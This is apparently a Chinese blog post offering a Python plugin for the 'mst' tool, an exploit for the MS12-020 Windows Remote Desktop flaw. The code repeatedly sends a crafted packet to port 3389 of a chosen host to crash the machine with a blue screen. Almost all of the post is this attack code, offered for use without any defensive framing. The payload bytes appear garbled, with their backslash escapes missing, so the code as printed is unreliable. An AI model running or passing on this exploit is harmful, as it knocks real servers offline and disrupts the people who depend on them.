ms12020 远程3389蓝屏攻击插件py版本

以下代码 保存为 qingms12020.py

传送门:http://mstoor.duapp.com/view/?pid=16

[code lang="js"]
# -*- coding: cp936 -*-
'''
mst=>plugin=>exploit
ms12_020
'''
from socket import *
class mstplugin:
'''ms12_020'''
infos = [
['插件','ms12_020 远程3389蓝屏Exploit'],
['作者','mst'],
['更新','2013/10/22'],
['网址','http://mstoor.duapp.com/']
]
opts = [
['RHOST','192.168.1.2','REMOTE HOST'],
['RPORT','3389','REMOTE PORT'],
['TIMES','100','SEND BUF TIMES'],
['TIMEOUT','5','SOCK SETTIMEOUT'],
['PAYLOAD','false','NO RETURN PAYLOAD']
]
buf=""
buf+="x03x00x00x13x0exe0x00x00"
buf+="x00x00x00x01x00x08x00x00"
buf+="x00x00x00x03x00x01xd6x02"
buf+="xf0x80x7fx65x82x01x94x04"
buf+="x01x01x04x01x01x01x01xff"
buf+="x30x19x02x04x00x00x00x00"
buf+="x02x04x00x00x00x02x02x04"
buf+="x00x00x00x00x02x04x00x00"
buf+="x00x01x02x04x00x00x00x00"
buf+="x02x04x00x00x00x01x02x02"
buf+="xffxffx02x04x00x00x00x02"
buf+="x30x19x02x04x00x00x00x01"
buf+="x02x04x00x00x00x01x02x04"
buf+="x00x00x00x01x02x04x00x00"
buf+="x00x01x02x04x00x00x00x00"
buf+="x02x04x00x00x00x01x02x02"
buf+="x04x20x02x04x00x00x00x02"
buf+="x30x1cx02x02xffxffx02x02"
buf+="xfcx17x02x02xffxffx02x04"
buf+="x00x00x00x01x02x04x00x00"
buf+="x00x00x02x04x00x00x00x01"
buf+="x02x02xffxffx02x04x00x00"
buf+="x00x02x04x82x01x33x00x05"
buf+="x00x14x7cx00x01x81x2ax00"
buf+="x08x00x10x00x01xc0x00x44"
buf+="x75x63x61x81x1cx01xc0xd8"
buf+="x00x04x00x08x00x80x02xe0"
buf+="x01x01xcax03xaax09x04x00"
buf+="x00xcex0ex00x00x48x00x4f"
buf+="x00x53x00x54x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x04x00x00"
buf+="x00x00x00x00x00x0cx00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x01xcax01x00x00x00x00"
buf+="x00x10x00x07x00x01x00x30"
buf+="x00x30x00x30x00x30x00x30"
buf+="x00x2dx00x30x00x30x00x30"
buf+="x00x2dx00x30x00x30x00x30"
buf+="x00x30x00x30x00x30x00x30"
buf+="x00x2dx00x30x00x30x00x30"
buf+="x00x30x00x30x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x04xc0x0c"
buf+="x00x0dx00x00x00x00x00x00"
buf+="x00x02xc0x0cx00x1bx00x00"
buf+="x00x00x00x00x00x03xc0x2c"
buf+="x00x03x00x00x00x72x64x70"
buf+="x64x72x00x00x00x00x00x80"
buf+="x80x63x6cx69x70x72x64x72"
buf+="x00x00x00xa0xc0x72x64x70"
buf+="x73x6ex64x00x00x00x00x00"
buf+="xc0x03x00x00x0cx02xf0x80"
buf+="x04x01x00x01x00x03x00x00"
buf+="x08x02xf0x80x28x03x00x00"
buf+="x0cx02xf0x80x38x00x06x03"
buf+="xefx03x00x00x0cx02xf0x80"
buf+="x38x00x06x03xebx03x00x00"
buf+="x0cx02xf0x80x38x00x06x03"
buf+="xecx03x00x00x0cx02xf0x80"
buf+="x38x00x06x03xedx03x00x00"
buf+="x0cx02xf0x80x38x00x06x03"
buf+="xeex03x00x00x0bx06xd0x00"
buf+="x00x12x34x00"
def exploit(self):
'''start exploit'''
color.cprint("[+] Connect to %s .."%RHOST,YELLOW)
for i in range(int(TIMES)):
s=socket(AF_INET,SOCK_STREAM)
s.settimeout(int(TIMEOUT))
try:
s.connect((RHOST,int(RPORT)))
color.cprint("[+] Send %-5s Bytes.."%len(self.buf),GREEN)
s.send(self.buf)
rec=s.recv(100)
color.cprint("[+] Recv %-5s Bytes.."%len(rec),YELLOW)
s.close()
except Exception,e:
color.cprint("[!] Exploit False !CODE:%s"%e,RED)

[/code]

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码